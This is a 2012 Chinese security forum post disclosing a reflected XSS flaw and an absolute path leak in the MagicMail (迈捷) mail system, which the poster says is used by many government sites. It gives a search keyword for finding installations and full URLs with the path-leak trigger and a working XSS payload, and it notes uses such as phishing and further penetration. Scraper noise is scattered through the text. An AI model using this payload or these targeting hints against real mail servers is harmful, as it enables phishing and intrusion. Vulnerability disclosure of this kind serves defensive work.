找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1915|回复: 0
打印 上一主题 下一主题

MagicMail迈捷邮件系统XSS及绝对路径漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-11-9 20:38:41 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞* s' d6 C2 z2 ^/ D  P9 O
1 E( ^# G8 W/ o6 V% Z

) ?) h, p& {: f包含  一个反射性XSS  以及  绝对路径泄漏1 i4 \% Z: r5 w6 N
看了看 貌似全部是linux的。
! B' u, n  c& k3 { 2 ~, m* h6 S  l2 j( n% N& X/ B
关键字:迈捷邮件系统 by MagicMail" I9 U+ A1 y4 c% c

" ?" q( l! K* U  p可以看到很多政府网站都用这个邮件系统3 W5 n% V1 R; O3 K+ [

% i; C0 n5 b3 T( }+ P4 v/ H绝对路径 http://madman.in/index.php?login_type=declare&language=- ]. Z2 B. s0 q* x! c

: ]( Q$ B) n2 C$ U, c0 H1 y* \1 \' D. e2 d  O2 e8 [

) g" n, w5 N/ w& G) y& nXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
4 f9 d7 d: b2 G  k7 s  A7 ?* c4 B; C8 l8 x( y
4 \+ O. X$ _3 l& ~8 g
. k. H. p: ~) `8 {" A+ a3 ~
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等/ u% p( j8 {& Y7 B! F* o* f
' M- S$ f" {6 O
修复方案:看官方补丁吧。! o: \. p9 I" ^# R4 o
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表